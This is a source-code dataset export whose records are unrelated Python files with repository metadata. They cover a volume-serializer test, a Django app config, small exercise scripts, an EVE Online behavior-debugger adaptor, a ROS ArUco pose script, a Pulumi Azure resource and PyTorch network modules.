device='/foo1')],
display_name='vol1_name',
display_description='vol1_desc',
volume_type='vol1_type',
snapshot_id='snap1_id',
metadata=dict(
foo='vol1_foo',
bar='vol1_bar',
),
),
dict(
id='vol2_id',
status='vol2_status',
size=1024,
availability_zone='vol2_availability',
created_at=datetime.datetime.now(),
attachments=[dict(
id='vol2_id',
volume_id='vol2_id',
server_id='instance_uuid',
device='/foo2')],
display_name='vol2_name',
display_description='vol2_desc',
volume_type='vol2_type',
snapshot_id='snap2_id',
metadata=dict(
foo='vol2_foo',
bar='vol2_bar',
),
)]
text = serializer.serialize(dict(volumes=raw_volumes))
print text
tree = etree.fromstring(text)
self.assertEqual(NS + 'volumes', tree.tag)
self.assertEqual(len(raw_volumes), len(tree))
for idx, child in enumerate(tree):
self._verify_volume(raw_volumes[idx], child)
| [
"[email protected]"
] | |
283ddf0cecb6580e015b84c826afada6ef5234d6 | a0f579bc6b1dd310b232982240e15b3aeda8c80f | /apps.py | 729d0bb5df7cb1ae7664be531fccf28a02613b39 | [] | no_license | megala18/task | 886e944fc1b59dbd6fbb2485a38ae4bc00dee186 | 1bbe3b27f4a42be57507b34b3fccbf04a2ae02e5 | refs/heads/main | 2023-08-18T23:39:53.532379 | 2021-10-06T10:56:01 | 2021-10-06T10:56:01 | 414,173,117 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 152 | py | from django.apps import AppConfig
class CrudappConfig(AppConfig):
default_auto_field = 'django.db.models.BigAutoField'
name = 'crudApp'
| [
"[email protected]"
] | |
9f948546652be4760b5d078808483f504f292773 | d1ab86d9a87c0f22a8a266455e130ce41c7bce30 | /codekata/string.py | 329d461f9f5528dd7ebf412dc116fa174b624b09 | [] | no_license | madhankmr/guvi | 0a4cca09aa449d352feedbfc8f2312b2e164de2b | eea3ff1e3f02fe2cd003432417924a9548f12cb9 | refs/heads/master | 2020-06-03T08:24:22.988728 | 2019-07-09T10:32:25 | 2019-07-09T10:32:25 | 191,355,228 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 65 | py | S1,S2=input().split()
if (S1>=S2):
print(S1)
else:
print(S2)
| [
"[email protected]"
] | |
6c8b062cee0cd780d80f6ae73dd3510bd18e1fcc | 6eb097cccbc0e040eb940663f85ce7eacb2be95b | /Desafio061.py | fe389e9b9bf333e9d84a854ccc59923d3a836ef6 | [] | no_license | figueiredorodrigo/Exercicios-Guanabara | c7cdb534b3f7c2db0e2bffc2b4376af035213b3a | 621000882ab3aa080415bb04336fd1713ab85b5d | refs/heads/main | 2023-06-02T07:10:22.555624 | 2021-06-15T16:33:26 | 2021-06-15T16:33:26 | 376,381,603 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 228 | py | #Progressão aritmética com comand while
p1 = int(input('Primeeiro termo: '))
rz = int(input('Informe a razão da P.A: '))
tr = p1
cont = 1
while cont <= 10:
print(f' {tr} -> ', end= '')
tr += rz
cont += 1 | [
"[email protected]"
] | |
0457cef64ea7b68406f6e46a7669f6fc1dce58d8 | 163bbb4e0920dedd5941e3edfb2d8706ba75627d | /Code/CodeRecords/2518/49823/278350.py | 2cb366ad69dc313778213eda8c71db7c66cfe53f | [] | no_license | AdamZhouSE/pythonHomework | a25c120b03a158d60aaa9fdc5fb203b1bb377a19 | ffc5606817a666aa6241cfab27364326f5c066ff | refs/heads/master | 2022-11-24T08:05:22.122011 | 2020-07-28T16:21:24 | 2020-07-28T16:21:24 | 259,576,640 | 2 | 1 | null | null | null | null | UTF-8 | Python | false | false | 407 | py | def al(a,b):
l=[]
a=sorted(a)
b=sorted(b)
p,r=0,0
for i in range(len(a)):
while(b[p]<a[i] and p<len(b)-1):
p+=1
if(p==0):
d=abs(b[p]-a[i])
else:
d=min(abs(a[i]-b[p-1]),abs(b[p]-a[i]))
r=max(r,d)
print(r)
if __name__ == '__main__':
al([int(i) for i in input().split(',')],[int(i) for i in input().split(',')])
| [
"[email protected]"
] | |
cf1e3075185cefc817f86f6636ba6ca84b9a73ae | 2ff7e53d5e512cd762217ca54317982e07a2bb0c | /eve/devtools/script/behaviortools/clientdebugadaptors.py | 2a22a85a0875ed2b83664cddb9e4a59eb4130b2b | [] | no_license | nanxijw/Clara-Pretty-One-Dick | 66d3d69426642b79e8fd4cc8e0bec23adeeca6d6 | 50de3488a2140343c364efc2615cf6e67f152be0 | refs/heads/master | 2021-01-19T09:25:07.555284 | 2015-02-17T21:49:33 | 2015-02-17T21:49:33 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,637 | py | #Embedded file name: eve/devtools/script/behaviortools\clientdebugadaptors.py
import logging
from brennivin.messenger import Messenger
import eve.common.script.net.eveMoniker as moniker
from eve.devtools.script.behaviortools.debugwindow import BehaviorDebugWindow
import uthread2
logger = logging.getLogger(__name__)
EVENT_BEHAVIOR_DEBUG_UPDATE = 'OnBehaviorDebugUpdate'
EVENT_BEHAVIOR_DEBUG_CONNECT_REQUEST = 'OnBehaviorDebugConnectRequest'
EVENT_BEHAVIOR_DEBUG_DISCONNECT_REQUEST = 'OnBehaviorDebugDisconnectRequest'
class UpdateListener(object):
def __init__(self):
self.messenger = Messenger()
self.behaviorDebuggersByItemId = {}
sm.RegisterForNotifyEvent(self, EVENT_BEHAVIOR_DEBUG_UPDATE)
sm.RegisterForNotifyEvent(self, EVENT_BEHAVIOR_DEBUG_CONNECT_REQUEST)
sm.RegisterForNotifyEvent(self, EVENT_BEHAVIOR_DEBUG_DISCONNECT_REQUEST)
def AddObserverForItemId(self, itemId, handler):
if itemId in self.messenger.signalsByMessageName:
self.messenger.signalsByMessageName[itemId].clear()
self.messenger.SubscribeToMessage(itemId, handler)
def RemoveObserverForItemId(self, itemId, handler):
try:
self.messenger.UnsubscribeFromMessage(itemId, handler)
except:
logger.error('Failed to remove observer itemID=%s handler=%s', itemId, handler)
def OnBehaviorDebugUpdate(self, itemID, *args, **kwargs):
self.messenger.SendMessage(itemID, *args, **kwargs)
def TryConnectDebugger(self, itemID):
try:
debugger = ClientBehaviorDebugger(itemID)
debugger.Connect()
self.behaviorDebuggersByItemId[itemID] = debugger
except:
logger.exception('failed to connect to debugger for itemID=%s', itemID)
def OnBehaviorDebugConnectRequest(self, itemIDs):
itemIDs = sorted(itemIDs)
for itemID in itemIDs:
self.TryConnectDebugger(itemID)
def TryDisconnectDebugger(self, itemID):
try:
debugger = self.behaviorDebuggersByItemId.pop(itemID)
debugger.Disconnect()
except:
logger.exception('failed to disconnect to debugger for itemID=%s', itemID)
def OnBehaviorDebugDisconnectRequest(self, itemIDs):
for itemID in itemIDs:
self.TryDisconnectDebugger(itemID)
def HasDebugger(self, itemID):
return itemID in self.behaviorDebuggersByItemId
updateListener = UpdateListener()
class ClientBehaviorDebugger(object):
def __init__(self, itemID):
self.itemID = itemID
self.tree = []
self.treeMap = {}
self.events = []
self.debugWindow = None
self.isConnected = False
def Connect(self):
logger.debug('Debugger connecting to behavior of entity %s', self.itemID)
updateListener.AddObserverForItemId(self.itemID, self.OnBehaviorDebugUpdate)
entityLocation = moniker.GetEntityLocation()
treeData = entityLocation.EnableBehaviorDebugging(self.itemID)
self.isConnected = True
uthread2.StartTasklet(self.SetupDebugTree, treeData)
def Disconnect(self):
logger.debug('Debugger disconnecting from behavior of entity %s', self.itemID)
try:
updateListener.RemoveObserverForItemId(self.itemID, self.OnBehaviorDebugUpdate)
entityLocation = moniker.GetEntityLocation()
entityLocation.DisableBehaviorDebugging(self.itemID)
self.isConnected = False
if self.debugWindow is not None:
self.debugWindow.Close()
sm.UnregisterForNotifyEvent(self, 'OnSessionChanged')
except:
logger.exception('Failed while disconnecting :(')
def OnBehaviorDebugUpdate(self, events, taskStatuses, tasksSeen, blackboards, *args, **kwargs):
if self.debugWindow is None:
return
self.debugWindow.LoadEvents(events)
self.debugWindow.UpdateStatuses(taskStatuses)
self.debugWindow.UpdateTasksSeen(tasksSeen)
self.debugWindow.LoadBlackboard(blackboards)
def SetupDebugTree(self, treeData):
self.debugWindow = BehaviorDebugWindow.Open(windowID='BehaviorDebugWindow_%d' % self.itemID)
self.debugWindow.SetController(self)
self.debugWindow.LoadBehaviorTree(treeData)
sm.RegisterForNotifyEvent(self, 'OnSessionChanged')
def IsConnected(self):
return self.isConnected
def OnSessionChanged(self, isRemote, sess, change):
if 'solarsystemid2' in change:
if self.debugWindow is not None:
self.debugWindow.Close()
| [
"[email protected]"
] | |
bad0141d830a8379daeaf2e3cb693b8206344569 | f539c6b009b9e7964e8cd7b44963afef7b36b2e5 | /scripts/pose_aruco.py | e8378930bbe156d0c2d4ada6bf65384575e65d47 | [] | no_license | danielmessi13/pose_msgs | 8144eaf1c838a3178babd2ddfc8327a38863a7b7 | 990f18a9737e740d13adf6d40f955bac94298724 | refs/heads/master | 2020-08-22T14:16:51.892139 | 2019-10-20T19:12:05 | 2019-10-20T19:12:05 | 216,413,082 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,690 | py | #!/usr/bin/env python3
from pose_msgs.msg import TransformStampedCertainty
import rospy
from std_msgs.msg import Float64
from tf2_msgs.msg import TFMessage
import math
l_pose_x = 0
l_pose_y = 0
pose_x = 0
pose_y = 0
theta = 0
def callback(data):
# print("ID: " + data.transforms[0].child_frame_id)
# print("X: " + str(data.transforms[0].transform.translation.x))
# print("Y: " + str(data.transforms[0].transform.translation.y))
# print("W (Theta): " + str(data.transforms[0].transform.rotation.w))
global l_pose_x
global pose_x
global l_pose_y
global pose_y
global theta
if data.transforms[0].child_frame_id == "marker_id0":
l_pose_x = data.transforms[0].transform.translation.x
l_pose_y = data.transforms[0].transform.translation.y
orientation = data.transforms[0].transform.rotation
(roll, pitch, theta) = quaternion_to_euler(orientation.x, orientation.y, orientation.z, orientation.w)
if l_pose_y > 0:
l_pose_y = (-1 * l_pose_y)
else:
l_pose_y = abs(l_pose_y)
else:
pose_x = data.transforms[0].transform.translation.x
pose_y = data.transforms[0].transform.translation.y
if pose_y > 0:
pose_y = (-1 * pose_y)
else:
pose_y = abs(pose_y)
K_ANGLE = 20
pub = rospy.Publisher('front_back', Float64, queue_size=512)
pub2 = rospy.Publisher('left_right', Float64, queue_size=512)
distancia = abs(math.sqrt((l_pose_x - pose_x) ** 2 + (l_pose_y - pose_y) ** 2))
arc_to_move = math.atan2(l_pose_y - pose_y, l_pose_x - pose_x)
angle = (arc_to_move - theta) * K_ANGLE
# print("Arco a se mover: " + str(arc_to_move))
# print("Theta: " + str(theta))
# print("Angulo: " + str(angle))
# print(theta)
pub.publish(Float64(distancia))
pub2.publish(Float64(angle))
def listener_joy():
l_pose_x = 0
l_pose_y = 0
pose_x = 0
pose_y = 0
rospy.init_node('pose_aruco', anonymous=True)
rospy.Subscriber("/tf", TFMessage, callback)
rospy.spin()
def quaternion_to_euler(x, y, z, w):
import math
t0 = +2.0 * (w * x + y * z)
t1 = +1.0 - 2.0 * (x * x + y * y)
X = math.degrees(math.atan2(t0, t1))
t2 = +2.0 * (w * y - z * x)
t2 = +1.0 if t2 > +1.0 else t2
t2 = -1.0 if t2 < -1.0 else t2
Y = math.degrees(math.asin(t2))
t3 = +2.0 * (w * z + x * y)
t4 = +1.0 - 2.0 * (y * y + z * z)
Z = math.atan2(t3, t4)
return X, Y, Z
if __name__ == '__main__':
try:
listener_joy()
except rospy.ROSInterruptException:
pass
| [
"[email protected]"
] | |
e60c607287bab75ad3c8bd40437cacd67838444e | 82b946da326148a3c1c1f687f96c0da165bb2c15 | /sdk/python/pulumi_azure_native/streamanalytics/v20200301/input.py | 3a86e730433d5039270923b5be2f82279ac23e72 | [
"Apache-2.0",
"BSD-3-Clause"
] | permissive | morrell/pulumi-azure-native | 3916e978382366607f3df0a669f24cb16293ff5e | cd3ba4b9cb08c5e1df7674c1c71695b80e443f08 | refs/heads/master | 2023-06-20T19:37:05.414924 | 2021-07-19T20:57:53 | 2021-07-19T20:57:53 | 387,815,163 | 0 | 0 | Apache-2.0 | 2021-07-20T14:18:29 | 2021-07-20T14:18:28 | null | UTF-8 | Python | false | false | 10,175 | py | # coding=utf-8
# *** WARNING: this file was generated by the Pulumi SDK Generator. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from ... import _utilities
from . import outputs
from ._enums import *
from ._inputs import *
__all__ = ['InputInitArgs', 'Input']
@pulumi.input_type
class InputInitArgs:
def __init__(__self__, *,
job_name: pulumi.Input[str],
resource_group_name: pulumi.Input[str],
input_name: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
properties: Optional[pulumi.Input[Union['ReferenceInputPropertiesArgs', 'StreamInputPropertiesArgs']]] = None):
"""
The set of arguments for constructing a Input resource.
:param pulumi.Input[str] job_name: The name of the streaming job.
:param pulumi.Input[str] resource_group_name: The name of the resource group. The name is case insensitive.
:param pulumi.Input[str] input_name: The name of the input.
:param pulumi.Input[str] name: Resource name
:param pulumi.Input[Union['ReferenceInputPropertiesArgs', 'StreamInputPropertiesArgs']] properties: The properties that are associated with an input. Required on PUT (CreateOrReplace) requests.
"""
pulumi.set(__self__, "job_name", job_name)
pulumi.set(__self__, "resource_group_name", resource_group_name)
if input_name is not None:
pulumi.set(__self__, "input_name", input_name)
if name is not None:
pulumi.set(__self__, "name", name)
if properties is not None:
pulumi.set(__self__, "properties", properties)
@property
@pulumi.getter(name="jobName")
def job_name(self) -> pulumi.Input[str]:
"""
The name of the streaming job.
"""
return pulumi.get(self, "job_name")
@job_name.setter
def job_name(self, value: pulumi.Input[str]):
pulumi.set(self, "job_name", value)
@property
@pulumi.getter(name="resourceGroupName")
def resource_group_name(self) -> pulumi.Input[str]:
"""
The name of the resource group. The name is case insensitive.
"""
return pulumi.get(self, "resource_group_name")
@resource_group_name.setter
def resource_group_name(self, value: pulumi.Input[str]):
pulumi.set(self, "resource_group_name", value)
@property
@pulumi.getter(name="inputName")
def input_name(self) -> Optional[pulumi.Input[str]]:
"""
The name of the input.
"""
return pulumi.get(self, "input_name")
@input_name.setter
def input_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "input_name", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
Resource name
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter
def properties(self) -> Optional[pulumi.Input[Union['ReferenceInputPropertiesArgs', 'StreamInputPropertiesArgs']]]:
"""
The properties that are associated with an input. Required on PUT (CreateOrReplace) requests.
"""
return pulumi.get(self, "properties")
@properties.setter
def properties(self, value: Optional[pulumi.Input[Union['ReferenceInputPropertiesArgs', 'StreamInputPropertiesArgs']]]):
pulumi.set(self, "properties", value)
class Input(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
input_name: Optional[pulumi.Input[str]] = None,
job_name: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
properties: Optional[pulumi.Input[Union[pulumi.InputType['ReferenceInputPropertiesArgs'], pulumi.InputType['StreamInputPropertiesArgs']]]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
__props__=None):
"""
An input object, containing all information associated with the named input. All inputs are contained under a streaming job.
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] input_name: The name of the input.
:param pulumi.Input[str] job_name: The name of the streaming job.
:param pulumi.Input[str] name: Resource name
:param pulumi.Input[Union[pulumi.InputType['ReferenceInputPropertiesArgs'], pulumi.InputType['StreamInputPropertiesArgs']]] properties: The properties that are associated with an input. Required on PUT (CreateOrReplace) requests.
:param pulumi.Input[str] resource_group_name: The name of the resource group. The name is case insensitive.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: InputInitArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
An input object, containing all information associated with the named input. All inputs are contained under a streaming job.
:param str resource_name: The name of the resource.
:param InputInitArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(InputInitArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
input_name: Optional[pulumi.Input[str]] = None,
job_name: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
properties: Optional[pulumi.Input[Union[pulumi.InputType['ReferenceInputPropertiesArgs'], pulumi.InputType['StreamInputPropertiesArgs']]]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = InputInitArgs.__new__(InputInitArgs)
__props__.__dict__["input_name"] = input_name
if job_name is None and not opts.urn:
raise TypeError("Missing required property 'job_name'")
__props__.__dict__["job_name"] = job_name
__props__.__dict__["name"] = name
__props__.__dict__["properties"] = properties
if resource_group_name is None and not opts.urn:
raise TypeError("Missing required property 'resource_group_name'")
__props__.__dict__["resource_group_name"] = resource_group_name
__props__.__dict__["type"] = None
alias_opts = pulumi.ResourceOptions(aliases=[pulumi.Alias(type_="azure-nextgen:streamanalytics/v20200301:Input"), pulumi.Alias(type_="azure-native:streamanalytics:Input"), pulumi.Alias(type_="azure-nextgen:streamanalytics:Input"), pulumi.Alias(type_="azure-native:streamanalytics/v20160301:Input"), pulumi.Alias(type_="azure-nextgen:streamanalytics/v20160301:Input"), pulumi.Alias(type_="azure-native:streamanalytics/v20170401preview:Input"), pulumi.Alias(type_="azure-nextgen:streamanalytics/v20170401preview:Input")])
opts = pulumi.ResourceOptions.merge(opts, alias_opts)
super(Input, __self__).__init__(
'azure-native:streamanalytics/v20200301:Input',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None) -> 'Input':
"""
Get an existing Input resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = InputInitArgs.__new__(InputInitArgs)
__props__.__dict__["name"] = None
__props__.__dict__["properties"] = None
__props__.__dict__["type"] = None
return Input(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter
def name(self) -> pulumi.Output[Optional[str]]:
"""
Resource name
"""
return pulumi.get(self, "name")
@property
@pulumi.getter
def properties(self) -> pulumi.Output[Any]:
"""
The properties that are associated with an input. Required on PUT (CreateOrReplace) requests.
"""
return pulumi.get(self, "properties")
@property
@pulumi.getter
def type(self) -> pulumi.Output[str]:
"""
Resource type
"""
return pulumi.get(self, "type")
| [
"[email protected]"
] | |
4ac21bfa5c8507abc4cb0dd4aba87afea74a988a | 1da112d29c98d7ed16d1eadff407a3801f8e9085 | /modeling/backbone_all/common.py | 3df13a2e92ef75e0eae067c53144d0c43f16087d | [] | no_license | Kelvin-001/Semantic-segmentation | 80529d5167810dcf073f1611cf311a8c61f6d71f | 3a57bb7049ba9a50729f3d3121aa079d2bc2affb | refs/heads/main | 2023-03-22T12:29:51.432593 | 2021-03-17T14:21:11 | 2021-03-17T14:21:11 | 348,682,887 | 3 | 1 | null | null | null | null | UTF-8 | Python | false | false | 19,038 | py | import math
from inspect import isfunction
import torch
import torch.nn as nn
import torch.nn.functional as F
from torch.nn import Linear, Conv2d, BatchNorm1d, BatchNorm2d, PReLU, ReLU, Sigmoid, Dropout, MaxPool2d, \
AdaptiveAvgPool2d, Sequential, Module
from collections import namedtuple
class Swish(nn.Module):
def forward(self, x):
return x * torch.sigmoid(x)
class HSigmoid(nn.Module):
def forward(self, x):
return F.relu6(x + 3.0, inplace=True) / 6.0
class HSwish(nn.Module):
def __init__(self, inplace=False):
super(HSwish, self).__init__()
self.inplace = inplace
def forward(self, x):
return x * F.relu6(x + 3.0, inplace=self.inplace) / 6.0
def get_activation_layer(activation):
assert (activation is not None)
if isfunction(activation):
return activation()
elif isinstance(activation, str):
if activation == "relu":
return nn.ReLU(inplace=True)
elif activation == "relu6":
return nn.ReLU6(inplace=True)
elif activation == "swish":
return Swish()
elif activation == "hswish":
return HSwish(inplace=True)
elif activation == "sigmoid":
return nn.Sigmoid()
elif activation == "hsigmoid":
return HSigmoid()
elif activation == "identity":
return Identity()
else:
raise NotImplementedError()
else:
assert (isinstance(activation, nn.Module))
return activation
class InterpolationBlock(nn.Module):
def __init__(self,
scale_factor,
mode="bilinear",
align_corners=True):
super(InterpolationBlock, self).__init__()
self.scale_factor = scale_factor
self.mode = mode
self.align_corners = align_corners
def forward(self, x):
return F.interpolate(
input=x,
scale_factor=self.scale_factor,
mode=self.mode,
align_corners=self.align_corners)
def __repr__(self):
s = "{name}(scale_factor={scale_factor}, mode={mode}, align_corners={align_corners})"
return s.format(
name=self.__class__.__name__,
scale_factor=self.scale_factor,
mode=self.mode,
align_corners=self.align_corners)
def calc_flops(self, x):
assert (x.shape[0] == 1)
if self.mode == "bilinear":
num_flops = 9 * x.numel()
else:
num_flops = 4 * x.numel()
num_macs = 0
return num_flops, num_macs
class IBN(nn.Module):
def __init__(self,
channels,
first_fraction=0.5,
inst_first=True):
super(IBN, self).__init__()
self.inst_first = inst_first
h1_channels = int(math.floor(channels * first_fraction))
h2_channels = channels - h1_channels
self.split_sections = [h1_channels, h2_channels]
if self.inst_first:
self.inst_norm = nn.InstanceNorm2d(
num_features=h1_channels,
affine=True)
self.batch_norm = nn.BatchNorm2d(num_features=h2_channels)
else:
self.batch_norm = nn.BatchNorm2d(num_features=h1_channels)
self.inst_norm = nn.InstanceNorm2d(
num_features=h2_channels,
affine=True)
def forward(self, x):
x1, x2 = torch.split(x, split_size_or_sections=self.split_sections, dim=1)
if self.inst_first:
x1 = self.inst_norm(x1.contiguous())
x2 = self.batch_norm(x2.contiguous())
else:
x1 = self.batch_norm(x1.contiguous())
x2 = self.inst_norm(x2.contiguous())
x = torch.cat((x1, x2), dim=1)
return x
class Flatten(Module):
def forward(self, input):
return input.view(input.size(0), -1)
def l2_norm(input, axis=1):
norm = torch.norm(input, 2, axis, True)
output = torch.div(input, norm)
return output
class SEModule(Module):
def __init__(self, channels, reduction):
super(SEModule, self).__init__()
self.avg_pool = AdaptiveAvgPool2d(1)
self.fc1 = Conv2d(channels, channels // reduction, kernel_size=1, padding=0, bias=False)
nn.init.xavier_uniform_(self.fc1.weight.data)
self.relu = ReLU(inplace=True)
self.fc2 = Conv2d(channels // reduction, channels, kernel_size=1, padding=0, bias=False)
self.sigmoid = Sigmoid()
def forward(self, x):
module_input = x
x = self.avg_pool(x)
x = self.fc1(x)
x = self.relu(x)
x = self.fc2(x)
x = self.sigmoid(x)
return module_input * x
class bottleneck_IR(Module):
def __init__(self, in_channel, depth, stride=1):
super(bottleneck_IR, self).__init__()
if in_channel == depth:
self.shortcut_layer = MaxPool2d(1, stride)
else:
self.shortcut_layer = Sequential(
Conv2d(in_channel, depth, (1, 1), stride, bias=False), BatchNorm2d(depth))
self.res_layer = Sequential(
BatchNorm2d(in_channel),
Conv2d(in_channel, depth, (3, 3), (1, 1), 1, bias=False),
PReLU(depth),
Conv2d(depth, depth, (3, 3), stride, 1, bias=False),
BatchNorm2d(depth))
def forward(self, x):
shortcut = self.shortcut_layer(x)
res = self.res_layer(x)
return res + shortcut
class bottleneck_IR_SE(Module):
def __init__(self, in_channel, depth, stride=1):
super(bottleneck_IR_SE, self).__init__()
if in_channel == depth:
self.shortcut_layer = MaxPool2d(1, stride)
else:
self.shortcut_layer = Sequential(
Conv2d(in_channel, depth, (1, 1), stride, bias=False),
BatchNorm2d(depth))
self.res_layer = Sequential(
BatchNorm2d(in_channel),
Conv2d(in_channel, depth, (3, 3), (1, 1), 1, bias=False),
PReLU(depth),
Conv2d(depth, depth, (3, 3), stride, 1, bias=False),
BatchNorm2d(depth),
SEModule(depth, 16)
)
def forward(self, x):
shortcut = self.shortcut_layer(x)
res = self.res_layer(x)
return res + shortcut
from torch.nn.modules.utils import _pair
class SplAtConv2d(nn.Module):
"""Split-Attention Conv2d
"""
def __init__(self, in_channels, channels, kernel_size, stride=(1, 1), padding=(0, 0),
dilation=(1, 1), groups=1, bias=True,
radix=2, reduction_factor=4,
rectify=False, rectify_avg=False, norm_layer=None,
dropblock_prob=0.0, **kwargs):
super(SplAtConv2d, self).__init__()
padding = _pair(padding)
self.rectify = rectify and (padding[0] > 0 or padding[1] > 0)
self.rectify_avg = rectify_avg
inter_channels = max(in_channels*radix//reduction_factor, 32)
self.radix = radix
self.cardinality = groups
self.channels = channels
self.dropblock_prob = dropblock_prob
if self.rectify:
from rfconv import RFConv2d
self.conv = RFConv2d(in_channels, channels*radix, kernel_size, stride, padding, dilation,
groups=groups*radix, bias=bias, average_mode=rectify_avg, **kwargs)
else:
self.conv = Conv2d(in_channels, channels*radix, kernel_size, stride, padding, dilation,
groups=groups*radix, bias=bias, **kwargs)
self.use_bn = norm_layer is not None
if self.use_bn:
self.bn0 = norm_layer(channels*radix)
self.relu = ReLU(inplace=True)
self.fc1 = Conv2d(channels, inter_channels, 1, groups=self.cardinality)
if self.use_bn:
self.bn1 = norm_layer(inter_channels)
self.fc2 = Conv2d(inter_channels, channels*radix, 1, groups=self.cardinality)
if dropblock_prob > 0.0:
self.dropblock = DropBlock2D(dropblock_prob, 3)
self.rsoftmax = rSoftMax(radix, groups)
def forward(self, x):
x = self.conv(x)
if self.use_bn:
x = self.bn0(x)
if self.dropblock_prob > 0.0:
x = self.dropblock(x)
x = self.relu(x)
batch, rchannel = x.shape[:2]
if self.radix > 1:
splited = torch.split(x, rchannel//self.radix, dim=1)
gap = sum(splited)
else:
gap = x
gap = F.adaptive_avg_pool2d(gap, 1)
gap = self.fc1(gap)
if self.use_bn:
gap = self.bn1(gap)
gap = self.relu(gap)
atten = self.fc2(gap)
atten = self.rsoftmax(atten).view(batch, -1, 1, 1)
if self.radix > 1:
attens = torch.split(atten, rchannel//self.radix, dim=1)
out = sum([att*split for (att, split) in zip(attens, splited)])
else:
out = atten * x
return out.contiguous()
class rSoftMax(nn.Module):
def __init__(self, radix, cardinality):
super().__init__()
self.radix = radix
self.cardinality = cardinality
def forward(self, x):
batch = x.size(0)
if self.radix > 1:
x = x.view(batch, self.cardinality, self.radix, -1).transpose(1, 2)
x = F.softmax(x, dim=1)
x = x.reshape(batch, -1)
else:
x = torch.sigmoid(x)
return x
class DropBlock2D(nn.Module):
def __init__(self, drop_prob, block_size, share_channel=False):
super(DropBlock2D, self).__init__()
self.register_buffer('i', torch.zeros(1, dtype=torch.int64))
self.register_buffer('drop_prob', drop_prob * torch.ones(1, dtype=torch.float32))
self.inited = False
self.step_size = 0.0
self.start_step = 0
self.nr_steps = 0
self.block_size = block_size
self.share_channel = share_channel
def reset(self):
"""stop DropBlock"""
self.inited = True
self.i[0] = 0
self.drop_prob = 0.0
def reset_steps(self, start_step, nr_steps, start_value=0, stop_value=None):
self.inited = True
stop_value = self.drop_prob.item() if stop_value is None else stop_value
self.i[0] = 0
self.drop_prob[0] = start_value
self.step_size = (stop_value - start_value) / nr_steps
self.nr_steps = nr_steps
self.start_step = start_step
def forward(self, x):
if not self.training or self.drop_prob.item() == 0.:
return x
else:
self.step()
# get gamma value
gamma = self._compute_gamma(x)
# sample mask and place on input device
if self.share_channel:
mask = (torch.rand(*x.shape[2:], device=x.device, dtype=x.dtype) < gamma).unsqueeze(0).unsqueeze(0)
else:
mask = (torch.rand(*x.shape[1:], device=x.device, dtype=x.dtype) < gamma).unsqueeze(0)
# compute block mask
block_mask, keeped = self._compute_block_mask(mask)
# apply block mask
out = x * block_mask
# scale output
out = out * (block_mask.numel() / keeped).to(out)
return out
def _compute_block_mask(self, mask):
block_mask = F.max_pool2d(mask,
kernel_size=(self.block_size, self.block_size),
stride=(1, 1),
padding=self.block_size // 2)
keeped = block_mask.numel() - block_mask.sum().to(torch.float32)
block_mask = 1 - block_mask
return block_mask, keeped
def _compute_gamma(self, x):
_, c, h, w = x.size()
gamma = self.drop_prob.item() / (self.block_size ** 2) * (h * w) / \
((w - self.block_size + 1) * (h - self.block_size + 1))
return gamma
def step(self):
assert self.inited
idx = self.i.item()
if idx > self.start_step and idx < self.start_step + self.nr_steps:
self.drop_prob += self.step_size
self.i += 1
def _load_from_state_dict(self, state_dict, prefix, local_metadata, strict,
missing_keys, unexpected_keys, error_msgs):
idx_key = prefix + 'i'
drop_prob_key = prefix + 'drop_prob'
if idx_key not in state_dict:
state_dict[idx_key] = torch.zeros(1, dtype=torch.int64)
if idx_key not in drop_prob_key:
state_dict[drop_prob_key] = torch.ones(1, dtype=torch.float32)
super(DropBlock2D, self)._load_from_state_dict(
state_dict, prefix, local_metadata, strict,
missing_keys, unexpected_keys, error_msgs)
def _save_to_state_dict(self, destination, prefix, keep_vars):
"""overwrite save method"""
pass
def extra_repr(self):
return 'drop_prob={}, step_size={}'.format(self.drop_prob, self.step_size)
def reset_dropblock(start_step, nr_steps, start_value, stop_value, m):
if isinstance(m, DropBlock2D):
m.reset_steps(start_step, nr_steps, start_value, stop_value)
def get_activation_layer(activation, out_channels):
"""
